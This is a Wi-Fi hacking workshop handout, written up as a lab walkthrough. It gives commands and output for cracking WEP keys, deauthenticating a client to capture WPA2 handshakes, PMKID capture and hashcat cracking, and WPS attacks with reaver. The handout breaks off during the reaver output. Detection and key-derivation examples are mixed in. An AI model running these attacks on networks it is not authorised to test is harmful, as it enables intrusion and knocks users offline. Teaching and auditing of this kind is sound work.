---
tags: 'workshop'
---
Wi-Fi Hacking Lab
===
<i class="fa fa-file-pdf-o" aria-hidden="true"></i> **Wi-Fi Hacking Lab**
<i class="fa fa-user-circle-o" aria-hidden="true"></i> Johnny Pan
<i class="fa fa-clock-o" aria-hidden="true"></i> 2022-10-08
:::info
This lab was created for educational purposes, to help you audit and improve the security of the following wireless networks:
- Wired equivalent privacy (WEP)
- Wi-Fi Protected Access (WPA)
- Wi-Fi Protected Access v2 (WPA2)
:::
:::danger
Do it in your own wireless network.
:::
[TOC]
## Wireless hacking concepts
- WEP
- WPA
- WPA2
- Monitor Mode
- Promiscuous Mode
- Packet Injection
- 4-way handshake
- [EAPOL](https://vocal.com/secure-communication/eapol-extensible-authentication-protocol-over-lan/)
## Requirements
- Wi-Fi AP/Router
- Wi-Fi Adapter
- Aircrack-NG suite
- Linux OS
## Hacking WEP
### Changing to root user
```bash!
[codeskill@wireless ~]$ sudo su
```
### Identifying the wireless adapter
```bash!
[root@wireless ~]# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
```
### Enabling monitor mode
**Option #1 - Using ifconfig**
```bash!
[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# ifconfig wlan0 up
```
**Option #2 - Using airmon-ng**
```bash!
[root@wireless ~]# airmon-ng check wlan0
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
494 NetworkManager
1944 wpa_supplicant
```
```bash!
[root@wireless ~]# airmon-ng check kill
Killing these processes:
PID Name
1944 wpa_supplicant
```
```bash!
[root@wireless ~]# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
```
```bash!
[root@wireless ~]# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
```
### Changing MAC address
```bash!
[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# macchanger -r wlan0
[root@wireless ~]# ifconfig wlan0 up
```
### Selecting WEP encrypted SSID
```bash!
[root@wireless ~]# airodump-ng wlan0mon --encrypt wep
CH 6 ][ Elapsed: 48 s ][ 2022-10-09 23:59
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -40 26 0 0 11 54e WEP WEP OPENSOURCE
```
### Packet injection
```bash!
[root@wireless ~]# besside-ng wlan0mon -c 6 -b 00:18:39:E4:61:28
[00:21:02] Let's ride
[00:21:02] Resuming from besside.log
[00:21:02] Appending to wpa.cap
[00:21:02] Appending to wep.cap
[00:21:02] Logging to besside.log
[00:21:02] | Scanning chan 06
[00:21:02] / Scanning chan 06
[00:21:02] / Attacking [OPENSOURCE] WEP - PING
[00:21:02] - Attacking [OPENSOURCE] WEP - PING
...
[00:21:03] Associated to OPENSOURCE AID [1]
[00:21:03] - Attacking [OPENSOURCE] WEP - GET REPLAY
[00:21:03] | Attacking [OPENSOURCE] WEP - GET REPLAY
[00:21:03] / Attacking [OPENSOURCE] WEP - GET REPLAY
...
[00:21:42] \ Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
[00:21:42] | Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
[00:21:42] / Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
...
[00:23:18] - Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
[00:23:18] \ Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
[00:23:18] | Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
...
[00:42:56] | Attacking [OPENSOURCE] WEP - FLOOD - 44989 IVs rate 94 [193 PPS out] len 64
[00:42:56] \ Attacking [OPENSOURCE] WEP - FLOOD - 44999 IVs rate 94 [193 PPS out] len 64
[00:42:56] / Attacking [OPENSOURCE] WEP - FLOOD cracking - 45005 IVs rate 94 [193 PPS out] len 64
[00:42:56] Got key for OPENSOURCE [bf:53:9e:db:37] 45008 IVs
[00:42:56] Pwned network OPENSOURCE in 8:58 mins:sec
[00:42:56] TO-OWN [] OWNED [OPENSOURCE]
[00:42:56] All neighbors owned
```
### Cracking wep.cap file
```bash
[root@wireless ~]# aircrack-ng ./wep.cap
Aircrack-ng 1.7
[00:00:01] Tested 67097 keys (got 45009 IVs)
KB depth byte(vote)
0 0/ 1 BF(66560) D6(54272) 70(53504) 71(52480) 06(51968) 92(51968) C3(51200) 14(50944) 25(50944) 33(50688) EA(50688) 66(50432) 72(50176) C4(50176) 10(49920)
1 0/ 35 53(60160) 7E(53504) EE(53504) 0D(53248) 7F(52992) E2(52736) B9(52480) F0(52224) 03(51456) 18(51456) 8D(50944) F1(50944) D5(50688) 94(50432) BC(50432)
2 0/ 3 9E(65792) 52(57088) 95(54528) C3(53248) B8(52992) 41(52480) 03(51712) CB(51712) CE(51712) 9F(51200) 0B(50944) 14(50944) 4B(50944) BE(50944) BA(50688)
3 0/ 3 DB(65024) 23(57088) A6(54272) 62(52992) 3B(51968) 43(51712) 60(51712) AB(51712) B1(51712) 85(51456) B6(51456) BC(51200) CD(51200) 09(50944) C7(50944)
4 206/214 AC(41984) 44(41728) 47(41728) 52(41728) 8F(41728) 95(41728) B5(41728) C2(41728) CD(41728) ED(41728) 45(41472) 88(41472) B0(41472) DD(41472) FD(41472)
KEY FOUND! [ BF:53:9E:DB:37 ]
Decrypted correctly: 100%
```
## Hacking WPA/WPA2
### Changing to root user
```bash!
[codeskill@wireless ~]$ sudo su
```
### Identifying the wireless adapter
```bash!
[root@wireless ~]# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
```
### Enabling monitor mode
**Option #1 - Using ifconfig**
```bash!
[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# ifconfig wlan0 up
```
**Option #2 - Using airmon-ng**
```bash!
[root@wireless ~]# airmon-ng check wlan0
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
494 NetworkManager
1944 wpa_supplicant
```
```bash!
[root@wireless ~]# airmon-ng check kill
Killing these processes:
PID Name
1944 wpa_supplicant
```
```bash!
[root@wireless ~]# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
```
```bash!
[root@wireless ~]# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
```
### Changing MAC address
```bash!
[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# macchanger -r wlan0
[root@wireless ~]# ifconfig wlan0 up
```
### Selecting WPA/WPA2 encrypted SSID
```bash
[root@wireless ~]# airodump-ng wlan0mon
CH 13 ][ Elapsed: 1 min ][ 2022-10-10 23:03
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -50 41 6 0 6 54e WPA2 CCMP PSK OPENSOURCE
BE:A7:B9:14:DB:98 -57 40 0 0 6 130 WPA2 CCMP PSK ARTEMIS
BA:A7:B9:14:DB:98 -54 41 0 0 6 130 WPA2 CCMP PSK NARUTO
B6:A7:B9:14:DB:98 -57 42 0 0 6 130 WPA2 CCMP PSK TOTORO
B0:A7:B9:14:DB:98 -57 39 0 0 6 130 WPA2 CCMP PSK YOSHI
62:AF:97:C2:4E:24 -33 37 0 0 6 130 WPA2 CCMP PSK ARTEMIS
5E:AF:97:C2:4E:24 -33 40 0 0 6 130 WPA2 CCMP PSK NARUTO
5A:AF:97:C2:4E:24 -34 41 0 0 6 130 WPA2 CCMP PSK TOTORO
54:AF:97:C2:4E:24 -33 42 0 0 6 130 WPA2 CCMP PSK YOSHI
BSSID STATION PWR Rate Lost Frames Notes Probes
00:18:39:E4:61:28 16:41:DA:4E:36:EA -31 0 - 1e 0 23
```
### Monitor the network for a handshake
We press **`Ctrl+C`** and review the list of SSIDs, looking for the one we want to audit. In this case we are going to work with ==OPENSOURCE==.
A `handshake` occurs when a device connects to a network (e.g., when your computer connects to a router). You need to wait until a handshake occurs so you capture the data necessary to crack the password. To start monitoring, run the following command:
**airodump-ng --channel ==<CHANNEL>== --bssid ==<MAC-AP>== -w ==<CAPTURE-FILE>== wlan0mon**
In our case the values are the following:
**CHANNEL** = 6
**MAC-AP** = 00:18:39:E4:61:28
**CAPTURE-FILE** = wpa2
As long as this command stays running, you'll be monitoring that network for all connections and new handshakes.
```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH 6 ][ Elapsed: 0 s ][ 2022-10-10 23:25
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -51 100 43 1 0 6 54e WPA2 CCMP PSK OPENSOURCE
BSSID STATION PWR Rate Lost Frames Notes Probes
```
### Deauth attack
A deauth attack sends deauthentication packets to the router you're auditing, causing users to disconnect and forcing them to log back in. When a user logs back in, the client and the router perform a new handshake, which is what you need to crack the password. Without a deauth attack you might have to wait a long time for a handshake to happen on its own.
If you already see a line with the tag "WPA handshake:" followed by a MAC address in the output of the airodump-ng command, skip this step: you already have what you need to crack the password and don't need to send deauth packets.
```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH 6 ][ Elapsed: 1 min ][ 2022-10-10 30:24 ][ WPA handshake: 00:18:39:E4:61:28
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -48 100 690 31 0 6 54e WPA2 CCMP PSK OPENSOURCE
BSSID STATION PWR Rate Lost Frames Notes Probes
```
Wait for something to connect to the network. Once you see two MAC addresses appear next to each other, one under **BSSID** (the Wi-Fi router) and one under **STATION** (the computer or other device), a client is connected. To force them into a new handshake, you'll now send them deauth packets that kill their connection.
```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH 6 ][ Elapsed: 6 s ][ 2022-10-10 23:38 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -45 100 68 28 6 6 54e WPA2 CCMP PSK OPENSOURCE
BSSID STATION PWR Rate Lost Frames Notes Probes
00:18:39:E4:61:28 16:41:DA:4E:36:EA -43 1e- 1e 177 129 EAPOL OPENSOURCE
```
Open a new terminal. Make sure airodump-ng is still running in the original terminal window, and drag it to another place on your desktop so both terminals are visible.
Send the deauth packets. Run this command, replacing NETWORK BSSID with the router's BSSID and STATION BSSID with the BSSID of the client that connected to the network: `aireplay-ng -0 2 -a NETWORK BSSID -c STATION BSSID wlan0mon` (`-a` takes the access point and `-c` the client, as in the command below).
This command sends 2 rounds of deauth packets to disconnect the client from the network (each round appears in the output as 64 directed DeAuth frames). Don't send more than this: too many packets could prevent the client from reconnecting and generating the handshake.
As long as you're close enough to the target client, they'll be disconnected from the router and forced to reconnect with a handshake. If this doesn't work, move closer to the client.
As soon as the client reconnects, all of the information you'll need to crack the password will be available.
```bash
[root@wireless ~]# aireplay-ng -0 2 -a 00:18:39:E4:61:28 -c 16:41:DA:4E:36:EA wlan0mon
23:47:41 Waiting for beacon frame (BSSID: 00:18:39:E4:61:28) on channel 6
23:47:41 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [ 0|53 ACKs]
23:47:42 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [ 0|57 ACKs]
```
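The defender's side of the step above, as an added example (my code, not aircrack-ng's or the lab's): a small detector that parses raw 802.11 management frames and flags the burst pattern aireplay-ng produces, since a genuine disconnect is a single deauth frame while the run above shows 64 directed DeAuth frames in under a second from one transmitter/receiver pair. The frames and addresses are constructed inline from the lab's values; on a real network they would come from a monitor-mode capture.

```python
"""Deauthentication-flood detector for raw 802.11 management frames.

Added example for this lab (not part of the aircrack-ng suite). A genuine
disconnect is one deauth frame; the aireplay-ng run above shows the flood
signature instead: 64 directed DeAuth frames (reason code 7) in under a
second from a single transmitter/receiver pair. The frames below are
constructed inline to mimic that traffic.
"""
import struct
from collections import defaultdict, deque

DEAUTH = 0x0C      # management frame (type 0), subtype 12
DISASSOC = 0x0A    # management frame (type 0), subtype 10
AP = "00:18:39:E4:61:28"       # the lab access point (from the output above)
STATION = "16:41:DA:4E:36:EA"  # the lab client (from the output above)


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def build_deauth(dst: str, src: str, bssid: str, seq: int, reason: int = 7) -> bytes:
    """Build a bare 802.11 deauth frame: no radiotap header, no FCS."""
    frame_control = struct.pack("<H", DEAUTH << 4)  # version 0, type 0, subtype 12
    duration = struct.pack("<H", 0x013A)
    seq_ctrl = struct.pack("<H", seq << 4)          # fragment number 0
    reason_code = struct.pack("<H", reason)
    return (frame_control + duration + mac_to_bytes(dst) + mac_to_bytes(src)
            + mac_to_bytes(bssid) + seq_ctrl + reason_code)


def parse_frame(frame: bytes):
    """Return (subtype, dst, src, bssid, reason) for a management frame, else None."""
    if len(frame) < 24:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    if (fc >> 2) & 0x3 != 0:           # only management frames carry deauth/disassoc
        return None
    subtype = (fc >> 4) & 0xF
    dst, src, bssid = (bytes_to_mac(frame[o:o + 6]) for o in (4, 10, 16))
    reason = None
    if subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]
    return subtype, dst, src, bssid, reason


def detect_deauth_flood(frames, window_s=1.0, threshold=10):
    """Flag (src, dst) pairs sending more than `threshold` deauth/disassoc frames
    inside any `window_s` seconds. `frames` yields (timestamp, raw_bytes)."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, raw in frames:
        parsed = parse_frame(raw)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        _, dst, src, _, _ = parsed
        q = recent[(src, dst)]
        q.append(ts)
        while q and ts - q[0] > window_s:   # drop frames outside the window
            q.popleft()
        if len(q) > threshold:
            alerts[(src, dst)] = max(alerts.get((src, dst), 0), len(q))
    return alerts


def lab_sample():
    """Constructed capture: a 64-frame burst like aireplay-ng's, then one lone
    deauth (reason 3, 'station leaving') as an ordinary disconnect looks."""
    frames = [(100.0 + i * 0.01, build_deauth(STATION, AP, AP, seq=i)) for i in range(64)]
    frames.append((160.0, build_deauth(AP, "AA:BB:CC:00:11:22", AP, seq=900, reason=3)))
    return frames


if __name__ == "__main__":
    for (src, dst), n in detect_deauth_flood(lab_sample()).items():
        print(f"deauth flood: {n} frames from {src} to {dst} within 1 s")
```

Enabling 802.11w (Protected Management Frames) on the access point and clients is the mitigation: deauth and disassoc frames are then authenticated, so forged ones are discarded.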
### Cracking wpa2.cap file
When you see ==WPA handshake: <AP MAC ADDRESS>==, you can start cracking the password.
```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH 6 ][ Elapsed: 5 mins ][ 2022-10-10 23:52 ][ WPA handshake: 00:18:39:E4:61:28
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -49 100 3257 26 0 6 54e WPA2 CCMP PSK OPENSOURCE
BSSID STATION PWR Rate Lost Frames Notes Probes
```
In the original terminal window, press Control+C to quit airodump-ng. This stops the dump and leaves a capture file ending in `.cap` (here `wpa2-01.cap`, in the directory where you ran it).
Decompress the rockyou.txt wordlist. To crack the password, you'll need a wordlist. Fortunately, since you're using Kali Linux, you have several already in `/usr/share/wordlists`. The one we'll want to use is called `rockyou.txt`, but it's gzipped by default. To unzip it, run `gzip -d /usr/share/wordlists/rockyou.txt.gz`.
You won't be able to crack the password if it's not in the wordlist. You can always try one of the other wordlists if rockyou.txt doesn't crack the password.
```bash
apt install wordlists
gzip -d /usr/share/wordlists/rockyou.txt.gz
```
Run the command to crack the password. You'll use a tool called aircrack-ng, which comes with Kali Linux, to do so. The command is `aircrack-ng -a2 -b NETWORK BSSID -w /usr/share/wordlists/rockyou.txt ./wpa2-01.cap`. Replace NETWORK BSSID with the BSSID for the router.
Depending on the strength of the password and the speed of your CPU, this process can take anywhere from a few hours to a few days.
If you're cracking a static WEP key network instead of a WPA/WPA2-PSK network, replace `-a2` with `-a1`.
```bash
[root@wireless ~]# aircrack-ng -a2 -b 00:18:39:E4:61:28 -w /usr/share/wordlists/rockyou.txt ./wpa2-01.cap
Aircrack-ng 1.7
[00:00:00] 2171/10303727 keys tested (5462.94 k/s)
Time left: 31 minutes, 25 seconds 0.02%
KEY FOUND! [ qwerty123 ]
Master Key : 2C 08 85 AD 79 69 79 A6 8E 1D A2 C3 87 5A 2F 16
92 5F F4 87 E0 57 41 9C 27 CC AB 24 F2 29 49 4E
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : DF BB 43 33 70 11 D9 CB D3 F6 12 FF 42 BE CB 9A
```
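To make concrete what the **Master Key** line in the aircrack-ng output is, here is an added example (my code, not aircrack-ng's, hashcat's or the lab's) that derives the WPA2-PSK Pairwise Master Key the way IEEE 802.11i specifies. The SSID, passphrase and Master Key are copied from the output above, so running it checks that the derivation reproduces that key; the runtime estimate uses the candidate count, salt count and speed reported by the hashcat run in the PMKID section below.

```python
"""What the 'Master Key' in the aircrack-ng output is, and why the wordlist matters.

Added example for this lab (not aircrack-ng or hashcat code). WPA/WPA2-PSK turns
the passphrase into the 256-bit Pairwise Master Key with PBKDF2-HMAC-SHA1 over
4096 rounds, salted with the SSID (IEEE 802.11i). A cracker repeats exactly this
for every candidate and checks the handshake MIC (or PMKID) against the result,
so a passphrase missing from the wordlist is never tried, and work done for one
SSID does not carry over to another.
"""
import hashlib

PBKDF2_ROUNDS = 4096
PMK_LEN = 32

# Taken from the aircrack-ng output above.
LAB_SSID = "OPENSOURCE"
LAB_PASSPHRASE = "qwerty123"
LAB_MASTER_KEY = bytes.fromhex(
    "2C0885AD796979A68E1DA2C3875A2F16925FF487E057419C27CCAB24F229494E"
)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA-PSK passphrases are 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ROUNDS, PMK_LEN)


def matches_lab_master_key(candidate: str) -> bool:
    """True when a candidate reproduces the Master Key aircrack-ng printed."""
    return derive_pmk(candidate, LAB_SSID) == LAB_MASTER_KEY


def estimate_runtime_s(candidates: int, salts: int, rate_per_s: float) -> float:
    """Seconds to try every candidate against every distinct SSID (hashcat's
    'Salts'); PBKDF2 output cannot be shared across SSIDs, so the cost multiplies."""
    return candidates * salts / rate_per_s


if __name__ == "__main__":
    for candidate in ("password", "qwerty123", "OpenSource-2022!"):
        print(f"{candidate:18} -> {derive_pmk(candidate, LAB_SSID).hex()}"
              f"  matches lab key: {matches_lab_master_key(candidate)}")
    # rockyou.txt has 14,344,385 lines; the hashcat run in the PMKID section
    # reports 13 salts at 488 H/s, which is where its 4-day estimate comes from.
    days = estimate_runtime_s(14_344_385, 13, 488) / 86400
    print(f"exhausting rockyou against 13 SSIDs at 488 H/s: {days:.1f} days")
```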
## Hacking PMKID
### Installing the needed tools
```bash!
[root@wireless ~]# apt install hcxdumptool
[root@wireless ~]# apt install hcxtools
```
### Capturing PMKID packets
```bash
[root@wireless ~]# hcxdumptool -i wlan0 -o test.pcapng --enable_status=1
initialization of hcxdumptool 6.2.6 (depending on the capabilities of the device, this may take some time)...
interface is already in monitor mode, skipping ioctl(SIOCSIWMODE) and ioctl(SIOCSIFFLAGS) system calls
start capturing (stop with ctrl+c)
NMEA 0183 SENTENCE........: N/A
PHYSICAL INTERFACE........: phy3
INTERFACE NAME............: wlan0
INTERFACE PROTOCOL........: IEEE 802.11
INTERFACE TX POWER........: 20 dBm (lowest value reported by the device)
INTERFACE HARDWARE MAC....: 00c0cab1a5fc (not used for the attack)
INTERFACE VIRTUAL MAC.....: 00c0cab1a5fc (not used for the attack)
DRIVER....................: mt76x2u
DRIVER VERSION............: 5.18.0-kali7-amd64
DRIVER FIRMWARE VERSION...: 0.0.00-b1
openSSL version...........: 1.0
ERRORMAX..................: 100 errors
BPF code blocks...........: 0
FILTERLIST ACCESS POINT...: 0 entries
FILTERLIST CLIENT.........: 0 entries
FILTERMODE................: unused
WEAK CANDIDATE............: 12345678
ESSID list................: 0 entries
ACCESS POINT (ROGUE)......: a468bcb13022 (BROADCAST WILDCARD used for the attack)
ACCESS POINT (ROGUE)......: a468bcb13023 (BROADCAST OPEN used for the attack)
ACCESS POINT (ROGUE)......: a468bcb13024 (used for the attack and incremented on every new client)
CLIENT (ROGUE)............: d85dfb0ab897
EAPOLTIMEOUT..............: 20000 usec
EAPOLEAPTIMEOUT...........: 2500000 usec
REPLAYCOUNT...............: 63589
ANONCE....................: cad7dd6c8c75d9a5af42a1a29399dc14c5db8b0100d6c7e4775aa47fc1209146
SNONCE....................: 4eb39e5d37be518afb627de644677728ec23c81876d9fb772719fc391a9e35d7
TIME FREQ/CH MAC_DEST MAC_SOURCE ESSID [FRAME TYPE]
01:11:31 2442/7 6872c30f193c 54af97c24e24 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:4232 RC:63589 KDV:2]
01:11:47 2462/11 6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:6305 RC:63589 KDV:2]
01:13:50 2412/1 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:4445 RC:63589 KDV:2]
01:13:54 2417/2 94e6f78fdb99 a468bcb1302d ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:1563 RC:63589 KDV:2]
01:13:56 2422/3 6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:840 RC:63589 KDV:2]
01:14:00 2427/4 6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:4187 RC:63589 KDV:2]
01:14:05 2432/5 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:3132 RC:63589 KDV:2]
01:14:05 2432/5 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:1575 RC:63589 KDV:2]
01:14:05 2432/5 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:2548 RC:63589 KDV:2]
01:14:05 2432/5 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:5387 RC:63589 KDV:2]
01:14:08 2437/6 94e6f78fdb99 a468bcb1302d ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:1818 RC:63589 KDV:2]
01:14:17 2447/8 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:3958 RC:63589 KDV:2]
01:16:17 5805/161 a86daa1620a1 54af97c24e25 SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:4022 RC:63589 KDV:2]
01:16:19 5805/161 1c4d660367fb 6aaf97c24e25 ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:2319 RC:63589 KDV:2]
```
### Converting PCAP file to Hashcat file
```bash
[root@wireless ~]# hcxpcapngtool -E essidlist -I identitylist -U usernamelist -o test.22000 test.pcapng
hcxpcapngtool 6.2.7 reading from test.pcapng...
summary capture file
--------------------
file name................................: test.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 5.18.0-kali7-amd64
application..............................: hcxdumptool 6.2.6
interface name...........................: wlan0
interface vendor.........................: 00c0ca
openSSL version..........................: 1.0
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: a468bcb13024 (incremented on every new client)
MAC CLIENT...............................: d85dfb0ab897
REPLAYCOUNT..............................: 63589
ANONCE...................................: cad7dd6c8c75d9a5af42a1a29399dc14c5db8b0100d6c7e4775aa47fc1209146
SNONCE...................................: 4eb39e5d37be518afb627de644677728ec23c81876d9fb772719fc391a9e35d7
timestamp minimum (GMT)..................: 14.10.2022 01:11:07
timestamp maximum (GMT)..................: 14.10.2022 01:23:11
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)...............: little endian
packets inside...........................: 3780
packets received on 2.4 GHz..............: 1637
packets received on 5 GHz................: 1754
ESSID (total unique).....................: 67
BEACON (total)...........................: 79
BEACON on 2.4 GHz channel (from IE_TAG)..: 1 2 3 4 5 6 8 9 10 11
BEACON on 5/6 GHz channel (from IE-TAG)..: 36 40 44 48 149 161
BEACON (SSID wildcard/unset).............: 4
BEACON (SSID zeroed).....................: 2
ACTION (total)...........................: 33
ACTION (containing ESSID)................: 31
PROBEREQUEST.............................: 17
PROBEREQUEST (directed)..................: 2
PROBERESPONSE (total)....................: 59
AUTHENTICATION (total)...................: 75
AUTHENTICATION (OPEN SYSTEM).............: 75
ASSOCIATIONREQUEST (total)...............: 19
ASSOCIATIONREQUEST (PSK).................: 17
REASSOCIATIONREQUEST (total).............: 2
REASSOCIATIONREQUEST (PSK)...............: 2
EAPOL messages (total)...................: 3435
EAPOL RSN messages.......................: 3435
EAPOLTIME gap (measured maximum usec)....: 1479862
EAPOL ANONCE error corrections (NC)......: working
REPLAYCOUNT gap (suggested NC)...........: 2
EAPOL M1 messages (total)................: 2581
EAPOL M2 messages (total)................: 810
EAPOL M3 messages (total)................: 22
EAPOL M4 messages (total)................: 22
EAPOL pairs (total)......................: 8526
EAPOL pairs (best).......................: 17
EAPOL ROGUE pairs........................: 11
EAPOL pairs written to 22000 hash file...: 17 (RC checked)
EAPOL M12E2 (challenge)..................: 12
EAPOL M32E2 (authorized).................: 5
PMKID (useless)..........................: 40
PMKID (total)............................: 160
PMKID (best).............................: 6
PMKID ROGUE..............................: 5
PMKID written to 22000 hash file.........: 6
malformed packets (total)................: 3
BEACON error (total malformed packets)...: 3
frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
2412: 275 2417: 180 2422: 55 2427: 181
2432: 92 2437: 100 2442: 11 2447: 92
2452: 302 2457: 76 2462: 224 2467: 48
2472: 1 5180: 1220 5200: 3 5220: 164
5240: 139 5745: 1 5765: 71 5785: 59
5805: 95 5825: 2
session summary
---------------
processed pcapng files................: 1
```
### Cracking PMKID
```bash=
hashcat -m 22000 test.22000 -a 0 --kernel-accel=1 -w 4 --force '/usr/share/wordlists/rockyou.txt'
Session..........: hashcat
Status...........: Running
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: test.22000
Time.Started.....: Fri Oct 14 01:36:27 2022, (5 mins, 54 secs)
Time.Estimated...: Tue Oct 18 11:29:14 2022, (4 days, 9 hours)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 488 H/s (0.94ms) @ Accel:1 Loops:1024 Thr:1 Vec:8
Recovered........: 0/23 (0.00%) Digests (total), 0/23 (0.00%) Digests (new), 0/13 (0.00%) Salts
Progress.........: 496666/186477005 (0.27%)
Rejected.........: 332644/496666 (66.98%)
Restore.Point....: 38204/14344385 (0.27%)
Restore.Sub.#1...: Salt:7 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: september30 -> september22
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
```
## Hacking WPS
```bash
wash -i wlan0mon
BSSID Ch dBm WPS Lck Vendor ESSID
--------------------------------------------------------------------------------
00:22:75:E2:8C:2A 1 -50 1.0 No RalinkTe OPENSOURCE
```
```bash
reaver -i wlan0mon -b 00:22:75:E2:8C:2A -d 30 -S -N -vv
Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 00:22:75:E2:8C:2A
[+] Switching wlan0mon to channel 1
